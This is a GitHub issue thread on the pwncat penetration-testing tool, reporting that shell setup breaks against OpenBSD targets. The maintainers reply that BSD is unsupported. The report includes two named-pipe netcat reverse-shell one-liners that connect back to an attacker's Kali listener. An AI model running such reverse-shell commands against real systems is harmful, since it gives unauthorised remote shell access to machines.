### ISSUE TITLE
OpenBSD issues

### ISSUE THREAD

**Issue by juushya** [calebstewart/pwncat#45]
**Describe the bug**
OpenBSD has slightly different command switches. This breaks initial enumeration process, and shell does not get established.

**Describe the target system**
`OpenBSD 6.6 GENERIC#353 amd64`

**To Reproduce**
Netcat on OpenBSD does not support `-e`. So, I tested the following alternate ways:

On Kali - set up the listener:
```(pwncat-env) root@kali:/opt/pwncat# pwncat --listen --port 4444```

On OpenBSD terminal:

#### Case 1:
```
$ mkfifo f
$ /bin/sh 0<f | nc <kali-ip> 4444 | tee f
```
#### Case 2:
```
# mknod /tmp/backpipe p                                                                                               
# /bin/sh 0</tmp/backpipe | nc <kali-ip> 4444 1>/tmp/backpipe 
```
This initiates the connection, however the following initial, pre-shell set up commands fail:

```
<sanitized>
hostname: unknown option -- f
usage: hostname [-s] [name-of-host]
which: ip: Command not found.
which: python: Command not found.
which: python2: Command not found.
which: python3: Command not found.
which: python2.7: Command not found.
which: python3.6: Command not found.
which: python3.8: Command not found.
which: python3.9: Command not found.
script: unknown option -- -
usage: script [-a] [-c command] [file]
script:  exec script -q /dev/null /bin/sh
unknown option -- q
usage: script [-a] [-c command] [file] 
```

On Kali, we see the following:

```
(pwncat-env) root@kali:/opt/pwncat# pwncat --listen --port 4444
[19:49:13] received connection from <openbsd-ip>:23900 connect.py:148
[19:49:15] warning: no mac address; host hash only based on hostname  victim.py:311
           new host w/ hash 6adf97f83acf6553d5a6a5b1070f3755  victim.py:329
[19:49:19] pwncat running in /bin/sh  victim.py:363
```
At this point, the prompt synchronization gets stuck after reaching 85.XX%.

Breaking it results in the following traceback:

```
Traceback (most recent call last):
  File "/opt/pwncat/pwncat-env/bin/pwncat", line 11, in <module>
    load_entry_point('pwncat==0.3.1', 'console_scripts', 'pwncat')()
  File "/opt/pwncat/pwncat-env/lib/python3.8/site-packages/pwncat-0.3.1-py3.8.egg/pwncat/__main__.py", line 28, in main
    pwncat.victim.command_parser.dispatch_line(
  File "/opt/pwncat/pwncat-env/lib/python3.8/site-packages/pwncat-0.3.1-py3.8.egg/pwncat/commands/__init__.py", line 290, in dispatch_line
    command.run(args)
  File "/opt/pwncat/pwncat-env/lib/python3.8/site-packages/pwncat-0.3.1-py3.8.egg/pwncat/commands/connect.py", line 151, in run
    pwncat.victim.connect(client)
  File "/opt/pwncat/pwncat-env/lib/python3.8/site-packages/pwncat-0.3.1-py3.8.egg/pwncat/remote/victim.py", line 401, in connect
    self.run("unset PROMPT_COMMAND")
  File "/opt/pwncat/pwncat-env/lib/python3.8/site-packages/pwncat-0.3.1-py3.8.egg/pwncat/remote/victim.py", line 1035, in run
    sdelim, edelim = self.process(cmd, delim=wait, timeout=timeout)
  File "/opt/pwncat/pwncat-env/lib/python3.8/site-packages/pwncat-0.3.1-py3.8.egg/pwncat/remote/victim.py", line 1085, in process
    x = self.recvuntil(b"\n", timeout=timeout)
  File "/opt/pwncat/pwncat-env/lib/python3.8/site-packages/pwncat-0.3.1-py3.8.egg/pwncat/remote/victim.py", line 1928, in recvuntil
    data = self.client.recv(1)
KeyboardInterrupt
```

**Expected behavior**
1. OpenBSD command syntax is checked & handled.
2. Local & remote prompt should get synchronized.

**Comment by calebstewart** [comment]
I'm sorry for the long wait on a response here. I was busy with a different project for a while. As mentioned in the README, BSD is not officially supported. Some things may work, but there are a lot of undocumented differences between BSD and Linux. Accounting for all of them is effectively the same amount of work as adding support for multiple platforms. To quote the README: 

> While BSD is a Unix-based kernel, in practice it's userland tools are noticeably different from their Linux counterparts. Due to this, many of the automated features of pwncat will not work or outright fail when running against a BSD based target. I have tried to catch all errors or edge cases, however there are likely some hiccups which haven't been fully tested against BSD. In any case, the stabilized shell should function within a BSD environment, but I don't provide any guarantees.

If you have any ideas to move forward better supporting BSD, I'm open to it. In the meantime, I'm moving this issue over to "enhancements" as none of the advertised features of pwncat appear to be broken.

**Comment by trevorbryant** [comment]
I'm going to close this issue. If there's more to discover, another issue can be opened.
